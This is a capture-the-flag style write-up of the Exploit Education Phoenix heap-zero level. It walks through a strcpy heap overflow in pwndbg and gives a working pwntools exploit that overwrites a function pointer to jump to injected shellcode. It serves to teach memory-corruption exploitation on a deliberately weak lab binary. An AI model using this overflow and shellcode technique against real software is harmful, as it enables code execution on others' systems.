Phoenix64 Writeup - heap{n}

Introduction

This post documents my learning journey through the phoenix challenges from Exploit Education, focusing on memory corruption in x64 binaries.

Rather than rushing to an exploit, the goal is to digest the concepts:

• How to review code for memory safety issues

• How vulnerabilities arise in heap layouts

• How exploitation differs on x64

• How to reason about exploitation step-by-step

• How to fix the vulnerability correctly

Heap - 0 : Function Pointer Overwrite

Code Under Review

struct data {
  char name[64];
};

struct fp {
  void (*fp)();
  char __pad[64 - sizeof(unsigned long)];
};

d = malloc(sizeof(struct data));
f = malloc(sizeof(struct fp));
f->fp = nowinner;

strcpy(d->name, argv[1]);

Step 1: High-Level Program Behaviour

At runtime, the program:

1. Allocate 2 heap objects:

   1. struct data --> contains 64-bytes character buffer.

   2. struct fp --> contains a function pointer.

2. Initializes f->fp to nowinner

3. Copies user-controlled input (argv[1]) into d->name without bounds checking.

4. calls f->fp()

Intended Control Flow

main()
 └─ strcpy()         ← user input
 └─ f->fp()          ← indirect call
     ├─ nowinner()   ← default
     └─ winner()     ← goal

Step 2: Spotting the Vulnerability

🚨 Vulnerable Line

strcpy(d->name, argv[1]); // ACID

Why This is Dangerous

• d->name is 64 bytes.

• strcpy performs no bounds checking.

• Any input longer then 64 bytes will overflow into adjacent heap memory.

This is a heap-based overflow.

Step 3: Heap Layout Reasoning

Heap allocation are usually contiguous, malloc(sizeof(struct data)) followed by malloc malloc(sizeof(struct f)) often results in :

[Metadata 16 byes][d->name (64 bytes)][Metadata 16 byes][f->fp (8 bytes)] [...]

That means overflowing d->name can overwrite f->fp.

we can confirm that using a debugger after setting a breakpoint on strcpy() :

pwndbg> disassemble main
Dump of assembler code for function main:
   [...]
   0x0000000000400b17 <+56>:    call   0x4016ae <malloc>
   0x0000000000400b1c <+61>:    mov    QWORD PTR [rbp-0x8],rax
   0x0000000000400b20 <+65>:    mov    edi,0x40
   0x0000000000400b25 <+70>:    call   0x4016ae <malloc>
   0x0000000000400b2a <+75>:    mov    QWORD PTR [rbp-0x10],rax
   0x0000000000400b2e <+79>:    mov    rax,QWORD PTR [rbp-0x10]
   0x0000000000400b32 <+83>:    mov    QWORD PTR [rax],0x400ace
   0x0000000000400b39 <+90>:    mov    rax,QWORD PTR [rbp-0x20]
   0x0000000000400b3d <+94>:    add    rax,0x8
   0x0000000000400b41 <+98>:    mov    rdx,QWORD PTR [rax]
   0x0000000000400b44 <+101>:   mov    rax,QWORD PTR [rbp-0x8]
   0x0000000000400b48 <+105>:   mov    rsi,rdx
   0x0000000000400b4b <+108>:   mov    rdi,rax
   0x0000000000400b4e <+111>:   call   0x400860 <strcpy@plt>
   [...]
End of assembler dump.
pwndbg> b *main+111
Breakpoint 1 at 0x400b4e
pwndbg> r XXXXXXXXXXX
   [...]
─────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────────────
 RAX  0x7ffff7ef6010 ◂— 0
 RBX  0x7fffffffe548 —▸ 0x7fffffffe764 ◂— '/opt/phoenix/amd64/heap-zero'
 RCX  0x7ffff7da5e14 (mmap64+133) ◂— cmp rax, -1
 RDX  0x7fffffffe781 ◂— 'XXXXXXXXXXX'
 RDI  0x7ffff7ef6010 ◂— 0
 RSI  0x7fffffffe781 ◂— 'XXXXXXXXXXX'
    [...]'
 RIP  0x400b4e (main+111) ◂— call strcpy@plt
─────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate off ]──────────────────────────────────────────────────────
 ► 0x400b4e <main+111>    call   strcpy@plt                  <strcpy@plt>
        dest: 0x7ffff7ef6010 ◂— 0
        src: 0x7fffffffe781 ◂— 'XXXXXXXXXXX'
    [...]

We examine the values of d (at rbp-0x10) and f (at rbp-0x8), as well as the distance between them.

pwndbg> x/x $rbp-0x10
0x7fffffffe4e0: 0xf7ef6060
pwndbg> x/x $rbp-0x8
0x7fffffffe4e8: 0xf7ef6010
pwndbg> print/d 0xf7ef6060-0xf7ef6010
$1 = 80

f we proceed to the next line of code (using 'n'), we arrive right after the return of strcpy.

At the target memory location, we find exactly what we expected:

pwndbg> x/20gx 0x7ffff7ef6010
0x7ffff7ef6010: 0x5858585858585858      0x0000000000585858
0x7ffff7ef6020: 0x0000000000000000      0x0000000000000000
0x7ffff7ef6030: 0x0000000000000000      0x0000000000000000
0x7ffff7ef6040: 0x0000000000000000      0x0000000000000000
0x7ffff7ef6050: 0x0000000000000000      0x0000000000000051
0x7ffff7ef6060: 0x0000000000400ace      0x0000000000000000
0x7ffff7ef6070: 0x0000000000000000      0x0000000000000000
0x7ffff7ef6080: 0x0000000000000000      0x0000000000000000
0x7ffff7ef6090: 0x0000000000000000      0x0000000000000000
0x7ffff7ef60a0: 0x0000000000000000      0x00000000000fff61

We can observe that our "X"s have been copied to the address stored in 0x7ffff7ef6010. The data structure was 64 bytes in size. After the 64-byte mark, there are 16 bytes of metadata, followed by the start of the next chunk, where the second structure is allocated.

Additionally, we notice the value 0x00400ace at byte 0x7ffff7ef6060. This corresponds to the address of nowinner.

pwndbg> p nowinner
$2 = {<text variable, no debug info>} 0x400ace <nowinner>

We could simply overflow the buffer with 64 + 16 bytes, reach the function pointer, and overwrite it with our winner function. However, there's an issue in this case: the problem is that our winner function is located at the address:

pwndbg> p winner
$3 = {<text variable, no debug info>} 0x400abd <winner>

This address contains not only a null byte (actually, 5 null bytes, but since the memory is conveniently set to 0, this isn't an issue), but also a byte 0x0a. When strcpy copies the string, it will replace this byte with a null byte, which will terminate the string copy prematurely. As a result, the string won't be fully copied, and the overflow won't work as expected.

To reach the winner function, we introduce an extra layer of indirection. We place a small shellcode at the start of our buffer that jumps to the winner function (using push ADDR; ret).

Step 4: Exploitation

Before attempting exploitation, it’s good practice to inspect the binary’s security mitigations. This helps determine what kind of exploit is feasible and what complexity to expect.

Running checksec on the Phoenix heap-zero binary:

user@phoenix-amd64:/opt/phoenix/amd64$ checksec heap-zero
[*] '/opt/phoenix/amd64/heap-zero'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments
    RPATH:    '/opt/phoenix/x86_64-linux-musl/lib'

Interpreting Each Mitigation (x64 Context)

Arch: amd64-64-little

• 64-bit little-endian binary

• Function pointers and addresses are 8 bytes

• Endianness matters when overwriting pointers (little-endian)

This directly impacts how we craft the overflow payload.

RELRO

• Global Offset Table (GOT) is writable

Stack Canaries

• Stack-based overflows would not be detected

• Not-directly relevant here (heap overflow), but confirms

  • The binary is intentionally weak

  • No runtime detection of memory corruption

NX (Non-Executable Memory)

• Heap and stack memory is executable

• Shellcode injection would be possible

PIE

• Binary loads at fixed address

• Function addresses (like winner()) are constant

• No ASLR for the main function

RWX Segments

• Momory segments are readable, writable, and executable

• Extemly insecure by modern standards

By exploiting the heap buffer overflow, we can overwrite the function pointer fp with the address of our buffer, which doesn't include any null bytes. This is the core of the exploit:

import pwnlib
import struct

DATA_ADDR = 0x7ffff7ef6010
WINNER_ADDR = 0x400abd

pwnlib.context.arch = 'amd64'
shellcode = pwnlib.shellcraft.amd64.push(WINNER_ADDR)
shellcode += pwnlib.shellcraft.amd64.ret()

shellcode = pwnlib.asm.asm(shellcode, arch='amd64')

buf = shellcode + "A" * (80 - len(shellcode))
buf += struct.pack("<Q", DATA_ADDR)

print buf

And triggering the exploit:

user@phoenix-amd64:/opt/phoenix/amd64$ ./heap-zero $(python sol_heap1.y)
-bash: warning: command substitution: ignored null byte in input
Welcome to phoenix/heap-zero, brought to you by https://exploit.education
data is at 0x7ffff7ef6010, fp is at 0x7ffff7ef6060, will be calling 0x7ffff7ef6010
Congratulations, you have passed this level